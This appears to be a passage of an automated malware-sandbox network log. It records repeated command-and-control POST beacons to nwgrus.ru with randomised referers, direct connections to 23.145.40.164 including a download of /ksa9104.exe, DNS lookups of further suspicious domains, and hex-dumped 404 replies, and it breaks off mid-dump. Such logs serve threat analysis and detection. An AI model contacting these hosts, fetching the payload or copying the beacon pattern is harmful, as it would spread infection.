Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lsncadftghcgkll.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 258Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lpydjvblecmmk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 182Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://iepqpqyryvhgtcv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 145Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://oenjfnfpfgckga.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 161Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nufhygmjiointcnq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 225Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hsidmskxdmqv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tnccrjrkqwl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ttovpyftqljtjbyu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 181Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rajflukkjfv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 345Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://toscrejivnmddao.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xkeohrrlcufnjh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wmgqjswjxdwbrcxb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 289Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kfvlpgkryjcljktf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 178Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qcmpeqxglbq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 320Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xorfrgussemjiclx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 333Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bpaltdgxnlbrc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ourjknfcrerebmfy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wijyucejeixqcq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tvxqtlroqjamdu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qiqpuprruvmqycfg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 239Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ducngusiibkxomb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 204Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://itbfgbtaejscu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fmklqfxisct.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 115Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ukccamwydghjkfi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nkxctepgnvx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ijdjdfrkcsdu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 170Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://virsnusoyawwgc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 311Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mtnalmdiriqcam.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://chjuadirxhpxkwiq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 122Host: nwgrus.ru

Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164

Source: global traffic	DNS traffic detected: DNS query: nwgrus.ru
Source: global traffic	DNS traffic detected: DNS query: ninjahallnews.com
Source: global traffic	DNS traffic detected: DNS query: fallhandbat.com

Source: unknown

HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fxxmebwwqsmoglpj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: nwgrus.ru

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:37:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 87 ee Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:37:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:37:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:37:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:37:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:37:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:37:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:37:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:37:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 